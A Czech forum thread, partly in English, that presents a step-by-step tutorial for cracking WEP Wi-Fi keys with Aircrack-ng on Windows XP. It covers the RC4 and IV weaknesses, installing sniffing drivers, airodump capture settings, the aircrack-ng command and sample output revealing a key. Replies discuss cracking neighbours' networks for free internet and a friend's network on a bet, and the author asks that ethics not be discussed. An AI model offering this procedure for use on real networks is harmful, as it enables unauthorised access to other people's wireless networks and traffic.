Jump to content
Batsup

[WiFi] WEP Security crack

Recommended Posts

prelozeno z

http://www.tazforum.thetazzone.com/viewtopic.php?t=2069

Na webu aircracku sem nasel video tutorial ktery zrejme popisuje to co je v tomhle tutorialu.

VIDEO TUTORIAL

Crack WEP s Windows XP Pro SP2

Co je WEP:

Wired Equivalent Privacy (WEP) je casto povazovan za protokol 100% chranici bezdratovy prenos i kdyz to neni pravda.

Z jmena vyplyva ze WEP byla navrzena tak aby bezdratovy prenos mel stejne zabezpeceni jako LAN, coz je skoro nemozne.

LAN je neodmyslytelne bezpecnejsi nez WLAN kvuli fyzickym a mistnim omezenim. Utocnik, ktery chce data z LAN site, musi byt na sit pripojen - cemuz se zabranuje mnohem jednoduseji nez na WLAN.

WEP pracuje na nizsich urovnich OSI modelu, konkretne na urovnich 1 a 2, takze neposkytuje uplnou bezpecnost datoveho prenosu.

WEP muze poskytovat uroven bezpecnosti mezi clientem WLAN a pristupovym bodem AP(Infrastructure) nebo mezi dvema klienty(AdHoc).

Standardy WEP:

WEP je casto pouzivan jako 64 nebo 128 bitove sifrovani. Tyto sifrovani jsou obcas nazyvany jako 40 nebo 104 bitove kvuli tomu ze kazdy packet je sifrovan RC4 sifrovacim proudem ktery je generovan RC4 klicem. Tento klic je 64 bitovy ale WEP klic je 40 bitovy + 24 bitovy inicializacni vektor(IV) proto je WEP klic obcas povazovan za 40 bitovy.

Z toho vyplyvajici sifra je 'XOR'd' s cistymi textovymi daty k zasifrovani celeho packetu. K rozsifrovani packetu je WEP klic pouzivan k generaci identickeho 'key stream' na druhem konci k rozsifrovani celeho packetu, ale o tomhle pozdeji, stejne tak pozdeji vysvetlim podrobneji IV'cka.

Chyby WEP:

Slysel sem jak vsichni rikaj ze WEP je lehce prolomitelny a nemel by byt pouzivan, muze byt prolomen v 10 minutach atd ale cim to je?

No muj nazor je ze WEP je spatny z techto duvodu:

1) Inicializacni vektory jsou opakovane pouzivany s zasifrovanymi pakety. Protoze IV je pouze 24 bitu dlouhy tak je pouze otazka casu nez se pouzije znova. Tohle a to ze muzete mit az 50+ klientu pouzivajici stejny WEP klic jen sance na znovupouziti IV jen zvysuje.

IV je poslan s zasifrovanou casti paketu. Znovupouziti jakehokoliv sifrovaciho elementu je vzdy podstatna trhlina toho sifrovani a protoze IV neni nijak jinak zasifrovan tak toto je velka slabina WEP.

Cim vice RC4 sifrovacich proudu a cim vic IV je rozsifrovanych tim jsme bliz k objeveni WEP klice.

To je zaklad prolomeni WEP.

2) Algoritmus pouzivany k zasifrovani WEP hashe neni urcen k sifrovani. Originalni vyuziti Cyclic Redundancy Check (CRC-32) bylo detekovat chyby prenosu, ne sifrovat.

3) Nejvetsi chyba dle meho nazoru je masove pouzivani WEP klice.

Vsechno co se pripoji k jednomu AP potrebuje ten samy WEP klic takze vsechen z toho vyplyvajici provoz bude pouzivat ten samy WEP klic.

Jednen ne tak napadny vedlejsi efekt je ze kdyz pride na administraci site. Pokud mate 60 klientu a vsichni pouzivaji ten samy klic chcete je opravdu pravidelne menit.... je to jednodussi to nechat jak to je.

Bezdratove standardy:

IEEE definoval specifikaci bezdratoveho prenosu v 1997. Protokol ktery zverejnili je 802.11 standard.

Dnesni 802.11 ma mnoho ruznych variaci pro bezdratovy prenos. Nejcastejsi jsou:

1) 802.11 - tenhle specifikuje ze bezdratovy prenos bude pouzivat 2.4GHz frekvenci pouzivajici FHSS nebo DSSS. FHSS je protokol kde prenos 'preskoci' na preddefinovane frekvence a je casto pouzivan k zredukovani sumu pri prenosu. DSSS je take protokol pouzivany k redukci sumu ...

TADY SEM VYNECHAL RUZNY KECY A SKOCIM ROVNOU K NAVODU JAK TO CRACKNOUT

by combining the signal with a higher data rate bit sequence (commonly called a chipping code) which separates the data up in to a logical sequence and attaches a form of CRC to the packet before transmitting.

2) 802.11a – this provides data transmission in the 5GHz band at a rate of anything up to 54Mbps. Unlike the original 802.11 specification this uses Orthogonal Frequency Division Multiplexing (OFDM) to encode the traffic instead of FHSS or DSSS. OFDM is a method of transmitting digital data by splitting it up in to smaller ‘chunks’ and transmitting them at the same time but on different frequencies, which is why the data transfer rate is quite good.

3) 802.11b – came along in 1999 with the intention of allowing wireless functionality to be similar to that provided by Ethernet. It transmits data in the 2.4GHz band at 11Mbps using DSSS only. Is sometimes called Wi-Fi.

4) 802.11g – this works in the 2.4 GHz band at a rate of 20Mbps or more and came along in 2003. It uses OFDM like 802.11a and transmits data in a very similar way. However unlike 802.11a it is backward compatible with 802.11b.

A point worth noting here is if you have an 802.11b Wireless Adaptor you will not be able to receive 802.11g traffic. If you do want to get in to WEP cracking it is well worth your while investing in a dual band card. I will talk about Wireless Adaptors more later on.

How do we crack WEP:

Well cracking WEP is fairly easy to understand if you have followed what I explained above. We briefly touched on IV’s and WEP encryption and how they tie in together. To put it very simply, if you can decipher the IV algorithm you can decrypt or extract the WEP key.

As I stated before WEP very kindly transmits the IV in clear, so if we can run a mathematical equation against it we can find and decipher the RC4 stream that encrypted the whole packet in the first place.

The WEP ‘key’ is the missing value [key] from this mathematical equation. Remember the AP or the client has this key to use when decrypting the packet and is what we must find by running a complicated algorithm against the encrypted packet.

If you think about it like this it may become clearer:

You have an algorithm that is produced by concatenating a randomly generated 24 bit IV with your WEP Key – You also have an RC4 Key stream - the two are then ‘hashed’ together to encrypt the packet.

The IV is the hub of the whole process as this is they only thing that has used your WEP key. If we run a statistical anyalisis against the IV to try and decrypt the packet, we can find the key used at the begining of the process.

When you try to decrypt them, every time you crack a piece of the algorithm the corresponding plain text part of the packet is revealed, once the whole packet is decrypted you know the algorithm used to encrypt that particular packet – A crude way of describing it but as simple as I can make it.

Any attacker can passively collect encrypted data, after a while due to the limitations explained earlier; two IV’s that are the same will be collected. If two packets with the same IV are XOR’d, an XOR of the plain text data can be revealed. This XOR can then be used to infer data about the contents of the data packets.

The more identical IV’s collected the more plain text data can be revealed. Once all the plain text of a data packet is known, it will also been known for all data packets using the same IV.

So before any transmission occurs WEP combines the keystream with the payload using an XOR process, which produces ciphertext (data that has been encrypted). WEP includes the IV in clear in the first few bytes of the frame. The receiving AP / Client uses this IV along with the shared secret key (Your WEP Key) to decrypt the payload of the frame.

XOR is a mathematical algorithm which I am not even going to attempt to explain. This site explains it very well though:
[url]http://mathworld.wolfram.com/XOR.html[/url]


So in short – the more identical IV’s we can get the more plain text data we can reveal and the closer we get to obtaining the key used to encrypt the data in the first place.

As it is not pre-determined when we are going to receive identical IV’s it is impossible to say how many IV’s need to be collected but more about that later.

Pouzity software:

K tomuto utoku pouzijeme aircrak-ng pro Windows ktery najdete zde:

http://tinyshell.be/aircrackng/wiki/index.php?title=Aircrack-ng

Take tam stahnete cygwin1.dll a zkopirujte ho do stejneho adresare jako Aircrack-ng.

Jedna kopie cygwin1.dll uz je v Aircrack-ng ale je zastarala.

peek.dll a peek5.dll je take potreba v adresari Aircracku. Tady jsou:

http://tinyshell.be/aircrackng/wiki/index.php?title=Links

Pokud stahnete Winaircrack coz je verze s grafickym rozhranim aircracku ktery tady pouzivam ja tak dejte peek.dll a peek5.dll tam kde mate aircrack.

Az to stahnete tak mate moznost zkopirovat cestu k aircracku do vasi systemove promenne PATH abyste se nemuseli pokazde dostat do adresare bin v aircraku pomoci CD.

Jak na to:

Pravym tlacitkem na Tento Pocitac>Properties>Advanced>Enviroment Variables>v System Variables oznacte PATH>Edit>zadejte cestu do binu napriklad

C:\Documents and Settings\Nokia\Desktop\aircrack-ng-0.3-win\aircrack-ng-0.3-win\bin

a oddelte tuto cestu od jiz existujicich strednikem ;

Take potrebujete na Wild Packets vybrat novy ovladac pro vasi WiFi kartu.

http://www.wildpackets.com/

Tady je trochu problem s typem vasi WiFi karty nektere proste nejdou pouzit ke cracknuti WEP...

Ted byste meli mit:

Aircrack-ng

Cygwin1.dll – ve stejnem adresari jako Aircrack

Peek.dll and Peek5.sys ve stejnem adresari jako Aircrack

Driver z Wild Packets pro vasi WiFinu

Pridany aircrack-ng do PATHu

WiFina ktera funguje s Aircrackem

Co ted?

Ted potrebujeme nainstalovat novy driver pro vasi kartu.

**Pozor - nasledujici procedura prepise vase originalni ovladace, tak si je zazalohujte.**

!!!Novy driver vam neumozni se pripojit na AP a jit na internet!!!

99% originalnich ovladacu jsou udelany tak ze vase karta neprijme zadny protokol ktery nepodporuje. Peek driver uvede vasi kartu do vseobecneho modu ktery vam dovoli ||'sniff' ocichat.. prelozte si to sami|| vsechny protokoly pro ktere to jde.

Na instalaci otevrete Spravce Zarizeni a pravym tlacitkem kliknete na vasi WiFi kartu > Update Driver > Install from a Specific Location > Don't search, I will chose the driver to install > Have Disk > najdete downloadly drive > double click.

Win muze hodit okno ze ovladac neni podepsany. Pokud se tak stane kliknete na Continue.

Ted jsme pripraveni cracknout WEP!

Cracking WEPu:

Cracknuti WEPu je nyni celkem jednoducha vec, protoze vsechnu tezkou praci uz za nas udelal Chris Devine naprogramovanim vyborneho Aircracku. Vsechno co potrebujeme udelat je shromazdit data a spustit program. Pokud mate nejake otazky k Aircracku tak vyborne misto kam umistit svoje otazky je Netstumbler Linux Forum protoze Chris tam chodi celkem casto. Pripadne byste mu mohli poslat mail na [at] iie [dot] cnam [dot] fr - jestli ale odpovi nebo ne to nevim. Rozhodne nebude odpovidat na blby otazky - na ty pouzivejte forum.

Airodump

Tak otevrete prikazovy radek a napiste Airodump - nebo pokud jste nepridali cestu do binu do PATHu tak se musite dostat do binu pomoci CD.

Otevre se vam nove okno ktere najde vsechny nainstalovane wifi karty, da jim ciselne oznaceni a zobrazi nasledovne:

usage: airodump <nic index> <nic type> <channel(s)> <output prefix> [ivs only flag]

Known network adapters:

14  NETGEAR WG511T 54 Mbps Wireless PC Card
22  NETGEAR WAG511 802.11a/b/g Dual Band Wireless PC Card

Network interface index number  ->

Vyberte wifi kartu kterou chcete pouzit:

Network interface index number  -> 22

Potom musite zadat chipset vasi karty:

 Interface types:  'o' = HermesI/Realtek
                   'a' = Aironet/Atheros

 Network interface type (o/a)  ->

Ja pouzivam Atheros tak zadam 'a':

Network interface type (o/a)  -> a

Potom musime zadat kanal na kterem chceme oskenovat provoz:

Channel(s): 1 to 14, 0 = all  ->

USA pouziva kanaly 1 - 11 a Evropa az do kanalu 14. Kanal 11 je v USA nejpouzivanejsi takze ja zadam kanal 11. Pokud chcete skenovat vsechny kanaly tak zadejte 0.

Poznamka prekladatele: myslim ze v evrope je nejpouzivanejsi kanal 6

Pouziji kanal 11:

Channel(s): 1 to 14, 0 = all  -> 11

Nyni musite zvolit jak chcete ulozit ziskana data:

(note: if you specify the same output prefix, airodump will resume the capture session by appending data to the existing capture file)

Output filename prefix        ->

Pokud zadate jiz pouzite jmeno tak se nove ziskana data pridaji k predchozim - coz je vyborna vec ktera vam hodne zjednodussi praci!

Output filename prefix        ->WEP1

Nyni musime zadat jestli chceme ulozit pouze IV nebo vsechny pakety.

(note: to save space and only store the captured WEP IVs, press y.The resulting capture file will only be useful for WEP cracking)

Only write WEP IVs (y/n)      ->

Jelikoz vime ze na cracknuti WEPu jsou potreba pouze IV tak muzeme zadat ano. Vysledny soubor bude ulozen jako *.IVS.

Only write WEP IVs (y/n)      -> y

Tak ted uz jsme zadali vse potrebne, tak co se ted stane:


BSSID              PWR  Beacons   # Data  CH  MB  ENC   ESSID

00:09:5B:FD:C6:52   10        3        6  11  54  OPN   HOMEWIRELESS
00:30:F1:F5:A1:35   60      359     1234  11  54  WEP   Stuart

BSSID              STATION            PWR  Packets  ESSID

00:09:5B:FD:C6:52  00:09:5B:B6:1D:2A   17        6  HOMEWIRELESS
00:30:F1:F5:A1:35  00:09:5B:84:A6:DF   87     1793  Stuart

Tohle je vystup z uspesneho startu Airodumpu

BSSID = MAC adresa Access Pointu

PWR = Sila signalu

BEACONS = Kazdy AP posila kolem 10 signalu(beacon) za sekundu - tyto nejsou zasirovane a jsou nam k nicemu pokud chceme cracknout WEP. V podstate rikaji 'Jsem AP!! Pojd se ke me pripojit' :D

DATA = O tohle se zajimame. DATA pakety jsou nase IV ktere potrebujeme.

ENC = Kodovani - WEP / WPA / OPEN etc

ESSID = Jmeno bezdratove site. AP ho nevysila vzdy ale my ho potrebujeme abychom se mohli k AP pripojit.

Druha cast vypisuje vsechny clienty kteri jsou k AP pripojeni. Nekam si napiste jejich MAC adresy.

Nektere AP maji filtr MAC adres. Tohle je tabulka MAC adres ktere jsou na AP povoleny - pokud se zkusite pripojit s AP ktere ma filtr MAC adres AP si zkontroluje jestli ma vasi MAC adresu ve svem seznamu povolenych adres. Pokud tam nejste, tak i kdyz mate spravny WEP klic tak se k AP nepripojite. Take zanechate nejake info o some v logu. Toto je velmi uzitecna soucast Airodumpu ze nas informuje ze si musime zmenit MAC adresu kdyz se pripojujeme k AP.

[[zmenit mac ad.. bylo v originalu spoof you MAC ad.. spoof znamena delat si z nekoho legraci. Predpokladam ze ve slangu hackeru to je zmenit si MA.]]

DATA:

Jak jsem rekl je nemozne rict kolik IV je potreba na cracknuti WEP klice. Cim vic jich mate tim vetsi je sance na cracknuti WEP klice. Metodou pokus omyl jsem zjistil ze muzu cracknout 40 bitovy WEP klic za par sekund s zhruba 250,000 – 400,00 IV. Je to ale mozne i s mene IV, proste je to pokazde jinak.

Na 104 bitovy WEP klic je potreba alespon 2000000 IV a vetsinou este vic. Nejmensi pocet IV se kterym se mi povedlo cracknout 104 bitovy WEP klic bylo 710,325 a trvalo to 4 minuty a 31 sekund, ale vetsinou jsem potreboval vic jak 2 miliony IV.

Vyborna vlastnost Airodumpu je jiz zminene doplnovani uz existujicich souboru IV. Pokud jste shromazdili 500 000 IV a neuspesne jste se pokusili cracknout 64 bit, jednoduse spustte Airodump znova a pouzijte ten samy soubor IV! Vsechny nove IV budou pridany k jiz ulozenym takze nemusite shromazdovat vsechny ty IV odznova.

Nyni nashromazdte pozadovany pocet IV.

Aircrack-ng

Az se rozhodnete ze mate dost IV tak zmacknete CTRL + C. Ja jsem shromazdil 413,994 IV.

Nyni mate otevreno bile cmd tak tam napiste Aircrack-ng ( nebo se dostante do slozky Air. pomoci CD)

Nyni se vam zobrazi vycet toho co Aircrack umi.

 Common options:

     -a <amode> : force attack mode (1/WEP, 2/WPA-PSK)
     -e <essid> : target selection: network identifier
     -b <bssid> : target selection: access point's MAC
     -q         : enable quiet mode (no status output)
     -w <words> : path to a dictionary file

 Static WEP cracking options:

     -c         : search alpha-numeric characters only
     -t         : search binary coded decimal chr only
     -d <start> : debug - specify beginning of the key
     -m <maddr> : MAC address to filter usable packets
     -n <nbits> : WEP key length: 64 / 128 / 152 / 256
     -i <index> : WEP key index (1 to 4), default: any
     -f <fudge> : bruteforce fudge factor,  default: 2
     -k <korek> : disable one attack method  (1 to 17)
     -x         : do bruteforce the  last two keybytes
     -y         : experimental  single bruteforce mode

 Aircrack-ng 0.3 - (C) 2006 Thomas d'Otreppe
 Original work: Christophe Devine
 [url]http://www.aircrack-ng.org[/url]

 usage: aircrack-ng [options] <.cap / .ivs file(s)>

Tak ted napiseme nasledujici prikaz do Aircracku:

C:\Docu~\nokia>aircrack-ng -n 64 WEP1.ivs

Pouzijeme -n 64 prikaz protoze chceme cracknout 64 bitovy WEP klic.

Muzeme pouzit take -f prikaz, coz je 'fudge' faktor prepinac.

Slova programatora:

"By default, this parameter [fudge factor] is set to 2 for 104-bit WEP and to 5 for 40-bit WEP. Specify a higher value to increase the brute force level: cracking will take more time, but with a higher likelihood of success."

Takze pokud vas nebavi crackovat bez hrube sily muzete vyzkouset -f 5 prikaz.

Pokud jste zapomeli kam jste ulozili Airodump tak ten je defaultne ulozeny tady:

C:\Documents and Settings\%User Name%

Pokud jste ukladali pouze IV tak to bude .IVS soubor, jinak to bude .cap soubor.

Nas sken byl proveden pouze na jedne siti takze Aircrack bude crackovat pouze ty IV, pokud mate vic nez jednu sit tak musite pouzit -m prikaz k sdeleni BSSID wifi site kterou chcete cracknout.

Vystup z nasich prikazu je tento:

                                     Aircrack-ng 0.3


                     [00:00:00] Tested 1231 keys (got 413994 IVs)

  KB    depth   byte(vote)
   0    0/  4   A6(  68) 82(  40) EE(  20) E4(  15) 18(   5) 23(   5) 04(   3)
   1    0/  3   22(  75) 52(  19) 43(  15) 5A(  13) 21(   8) 8A(   5) B2(   4)
   2    0/  1   04(  76) 33(   8) 8B(   5) C8(   5) 47(   0) 62(   0) 63(   0)
   3    0/  1   09( 106) FB(  15) ED(  12) 58(  12) F0(  11) 29(   7) C8(   5)
   4    0/  1   EB( 153) 19(  27) 0E(  15) 38(  15) B8(  13) E0(  10) DC(   9)

                        KEY FOUND! [ A6:22:04:09:EB ]

Tak tady je vas 40 bitovy WEP klic: A6:22:04:09:EB.

S 413994 IV trvalo Aircracku cracknuti tohoto klice 1 sekundu. Nyni vidite jak je Aircrack dobry. S 250,000 IV by to trvalo sice jen o nekolik sekund dele ale je rozhodne bezpecnejsi shromazdit vice IV.

Jak jsem rekl programator udelal vsechnu tezkou praci za nas, jedine co musime udelat je rict co chceme udelat. Pro koncove uzivatele WEP cracking neni tezka vec k provedeni v jakemkoliv smeru ( jedine co musime udelat je rict Aircracku co delat) pokud si ovsem nechcete udelat vlastni program na cracknuti WEP klice.

FAQ a Odpovedi na otazky


Troubleshooting:

Common problems are:

Incompatible Wireless Card.

90% of my students who come to me complaining they can’t crack WEP and that Aircrack does not work are failing because they do not have a compatible Wireless Adaptor.
If you are giving the commands that I am giving here, or get an error message when installing the driver I can almost guarantee you that your card is not compatible. It is possible to flash the firmware of some Prisim2 Cards, this pages helps you do this:
[url]http://tinyshell.be/aircrackng/wiki/index.php?title=Prism2_flashing[/url]

Can’t receive DATA / IV’s with Airodump:

To receive IV’s from an AP there has to be a client associated with it that is sending / receiving traffic. If you are not receiving IV’s the most likely causes of this are that there is no associated clients or you are too far away from the AP. As far as I know Aireplay does not work with Windows so you will have to use a Packet Injection application of your choosing. I will cover this in Part 2.

Finally, if you are just plain unlucky you may just not be able to crack the WEP with the IV’s you have. If this happens the only option is to start from the beginning again.

If you cant crack the 64 bit WEP collect more IV’s and try doing it as a 104 bit WEP key.

My thanks go to Chris Divine, KoreK and all who helped him, for writing such a helpful application and to Thomas d'Otreppe who I believe imported it on to Windows?


FAQ

The following FAQ has been put together from questions in this thread. Additionally the following link was found by Moo and has proved very helpful:

[url]http://www.wirelessdefence.org/Contents/AircrackORIGINAL.html[/url]

Can we ask that you look through the FAQ in that link and this FAQ before you post questions here, thanks

Q. I can't get the Wild Packet drivers to work for my xxxxx wireless card. After I install it says the card will not work properly now?

A. You won’t be able to connect to the internet / AP in the conventional way after you install the Wild Packet drivers - these drivers place your card in a promiscuous mode to enable you to receive traffic not destined for you.

If you fire Airodump up after installing the drivers it should work, if they have been installed correctly. There are two versions of the drivers. If it does not work then either the drivers either haven’t been installed properly, you have installed the wrong version, or they are incompatible with your card.

After you have finished go to your device manager in your control panel and 'roll back' the driver to revert back to the original one so you can get normal connectivity.
____________________________________________________________

Q. Can I have two different wireless cards installed, one for general internet surfing and another with the Wild Packet drivers installed for penetration testing?

A. Yes, this is a good solution; I do it most of the time when I need internet connectivity and a passive connection at the same time. If you have more than one PCMCIA slot on your laptop use the same slot for each card - this will prevent you having to constantly reinstall the relevant drivers!
____________________________________________________________

Q. When I load Airodump I get the following error "LoadLibrary(Peek.dll) failed, make sure this file is present in the current directory." what does this mean?

A. You will need to get the peek.dll and peek5.sys files and put them in the same directory as Aircrack.

The easiest way to get them is to go here:
[url]http://tinyshell.be/aircrackng/wiki/index.php?title=Links[/url]
and download Winaircrack - which is a GUI version of Aircrack - copy and paste peek.dll and peek5.sys in to your directory.

You should have added cygwin1.dll, peek.dll and peek5.sys in to your directory before starting Airodump/Aircrack
____________________________________________________________

Q. When a click on (airdecap-ng,arpforge-ng.....),they quick open and close?

A. Read all of the paper......specifically the part about adding them to your path – once you have done this double clicking on the wont work any more.
____________________________________________________________

Q. I have it running fine, but the IV collection is really slow, can I speed it up at all?

A. If the wireless network does not have many clients, then IV collection will be very slow. If this is your own network open up a command prompt and type:

ping "ip address of AP" -l 65500 -t (That’s a small L not a |)

This will send a constant stream of ICMP packets 65500B big to the AP which should generate a good stream of IV's. This will only work if you are already associated with the AP and is for use to test YOUR OWN WEP KEY you cannot use it against somebody elses AP until you have associated with it.
____________________________________________________________

Q. How do I use Packet Injection to speed up collection of IV’s? / I can’t seem to get packet injection program xxxxxx to work properly, can you help?

A. Unfortunately Packet Injection is outside the scope of this tutorial and may be covered in a future one. For the time being you will have to do some research on Google.

btw tohle sem prelozil na jinym foru co umrelo tak to sem davam puvodni thread prekladu

http://andrewsm.net/psp/forum/showthread.php?t=4460

cracknout WEP dokaze podle tohodle navodu kazdej jedinej problem je ze nejsou wild packety pro vsechny WiFi karty

jakekoliv negativni ohlasy si prosim nechte pro sebe tady v tom threadu bych se chtel bavit o tom jak cracknout WEP zabezpeceni a ne o tom jestli to je spravne nebo ne...

nic? zadny ohlasy? no furt lepsi nez aby mi lidi nadavali :D :D kdyby se to nekomu hodilo poteste me tim ze sem napisete jestli se vam to povedlo ;)

Share this post


Link to post
Share on other sites

bohuzel to opravdu moc zkratit nejde ale zacnete tim ze si sezenete wild pakety pro vasi wifi kartu pokud je nesezenete tak mate smulu a nic necracknete( mate spatnej chip)

najdete je zde http://www.wildpackets.com/

pokud tam svoji kartu nenajdete tak nema cenu cist navod ;)

ale zbytek je napsany v navodu....

no sousedi maj wifi ale mam signal jen 53% tak nevim (nechces to skratit?)

no myslim ze to za to precteni stoji. vzdyt budes moct mit doma kdykoli internet a to za to stoji. Taky je dulezity jestli maj signal kodovany jako WEP nebo WPI. WPI je mnohem tezsi cracknout a ja to neumim... :D

Share this post


Link to post
Share on other sites
Nechce sa mi to zbytocne cele citat... iba jedna otazka... asi k tomu potrebujem aj wifi kartu na pc co?

jo potrebujes wifi kartu na pc ale nejenom nejakou obycejnou ale musi na ni bejt udelany specialni drivery takze pokud ji nemas tak si na ni bud udelej svoje drivery nebo mas nejspis smulu

zkus ten video tutorial

Share this post


Link to post
Share on other sites
Těch speciálních karet je opravdu jen 5? Nejsou ještě někde jiný drivery? A co ňáký speciální grafický program který provede všechno za nás? Návod není těžký, ale ňáká hezká klikačka která vyhodí klíč by byla lepší :)

Dá se v psp změnit mac adresa?

nevim o zadnym dalsim webu kde ty drivery maj... to neznamena ze nekde nejsou

no specialni graficky program.... rekneme ze takhle aspon vypadas jak vetsi machr ne? Proste nejde jenom o to abys cracknul WEP ale i o to aby to neumelo zas az tak moc lidi :D

Share this post


Link to post
Share on other sites
Tak jsem našel něco o podporovaných kartách

http://www.aircrack-ng.org/doku.php?id=compatibility_drivers

super!

takze ted si kdo chcete zjistete jakej mate chip a zkuste jestli je v tom seznamu tam.... ja to udelam taky

jo k mac adrese... nevim mozna existuje nejakej homebrew kterej to zvladne ale jinak nevim na kompu to de to umim

EDIT: web kde je spousta karet se svejma chipsetama http://www.linux-wlan.org/docs/wlan_adapters.html.gz

tady je jich nejspis este vic http://linux-wless.passys.nl/query_chipset.php?chipset=Atheros

ty weby jsou pro linux usery ale chipsety tam sou napsany taky zejo ;)

btw mam 2 wifi karty jednu s chipem Marvell -> nepodporovana a dalsi s chipem Ralink -> podporovana v linuxu!!! az budu mit nekdy naladu tak si cracknu WEP ;) a udelam z toho video tutorial

EDIT2: kdybyste nekdo chteli cracknout WPA tak uz vim jak na to ;) reknete mi ja na to mozna neco napisu nebo vam aspon polu odkaz na nejakej tutorial

Share this post


Link to post
Share on other sites

Máte někdo please tenhle soubor?? Nemůžu ho najít a ten odkaz co je na aircrack už nefunguje :cry: Soubor peek.dll jsem sice už našel a stáhnul, ale nevim jestli je funkční, tak kdyby jste ho přihodili k tomu peek5.sys byl bych moc vděčný ;)

A ještě jedna prosba. S angličtinou na tom nejsem nejlépe a tak jsem na http://www.wildpackets.com/ nenašel ovladače k mojí Wifi kartě(nezjistil jsem ani, zda je podporovaná :() Mám na notebooku "Intel® PRO/Wireless LAN 2100 3A Mini PCI Adapter" a byl bych vděčný za odpověď, zda je moje wifi podporovaná nebo ne popř. i ovladače k ní. Děkuji mnohokrát.

Share this post


Link to post
Share on other sites

stary, jak moje babicka.. Pod widlema bude crackovat hodne dlouho, s airodumpem a airplayem je to v linuxu cracknute hned..

.. navic jsou mnohem lepsi navody, zajimalo by mne, kolik jsi toho jiz cracknul..

EDIT: a jeste tady nekdo asi nedokaze rozpoznat software pro Windows od SW pro PSP.. smutne.

Share this post


Link to post
Share on other sites

Zdravim pokusam sa prelomit ochranu na Wifi sieti mojho kamosa stavili sme sa ze ho nezistim ....... ale ze nema nejake zlozite .... zistil som ze ma WEP key tak som isiel podla toho postup co je tu .....

[url]http://www.metacafe.com/watch/1106987/how_to_crack_wep_wireless_networks_for_noobs/[/url]

dostal som sa as po cmd/prikazovy riadok ..... ukaze mi toto wjutlk.jpg nevie co dalej pisu tam ze na WEP kluc 128/ci ako staci mat 500 000 packetov tie mam tak prosim co dalej ....

PS: viem ze je to nelegalne ale dal mi povolenie ze mu mozem naburat je to dobry priatel ..... to nieje problem

PS2: DAKUJEM ZA KAZDU POMOC A RADU

PS3: tu su moje nazbierane packety :

http://rapidshare.com/files/181762247/PACKETS.zip.html

Share this post


Link to post
Share on other sites
Guest
This topic is now closed to further replies.

×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use. Privacy Policy